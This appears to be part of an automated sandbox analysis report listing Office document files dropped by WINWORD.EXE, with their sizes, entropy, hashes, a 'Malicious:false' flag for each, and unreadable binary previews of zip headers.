                                                                                      SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                      SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):3078052
                                                                                      Entropy (8bit):7.954129852655753
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                      MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                      SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                      SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                      SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):777647
                                                                                      Entropy (8bit):7.689662652914981
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                      MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                      SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                      SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                      SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                      Malicious:false
                                                                                      Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):924687
                                                                                      Entropy (8bit):7.824849396154325
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                      MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                      SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                      SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                      SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):966946
                                                                                      Entropy (8bit):7.8785200658952
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                      MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                      SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                      SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                      SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                      Malicious:false
                                                                                      Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):1204049
                                                                                      Entropy (8bit):7.92476783994848
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                      MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                      SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                      SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                      SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                      Malicious:false
                                                                                      Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):486596
                                                                                      Entropy (8bit):7.668294441507828
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                      MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                      SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                      SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                      SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                      Malicious:false
                                                                                      Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):976001
                                                                                      Entropy (8bit):7.791956689344336
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                      MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                      SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                      SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                      SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):1463634
                                                                                      Entropy (8bit):7.898382456989258
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                      MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                      SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                      SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                      SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):2218943
                                                                                      Entropy (8bit):7.942378408801199
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                      MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                      SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                      SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                      SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):1750795
                                                                                      Entropy (8bit):7.892395931401988
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                      MD5:529795E0B55926752462CBF32C14E738
                                                                                      SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                      SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                      SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):2924237
                                                                                      Entropy (8bit):7.970803022812704
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                      MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                      SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                      SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                      SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):2357051
                                                                                      Entropy (8bit):7.929430745829162
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                      MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                      SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                      SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                      SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):3611324
                                                                                      Entropy (8bit):7.965784120725206
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                      MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                      SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                      SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                      SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):1091485
                                                                                      Entropy (8bit):7.906659368807194
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                      MD5:2192871A20313BEC581B277E405C6322
                                                                                      SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                      SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                      SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                      Malicious:false
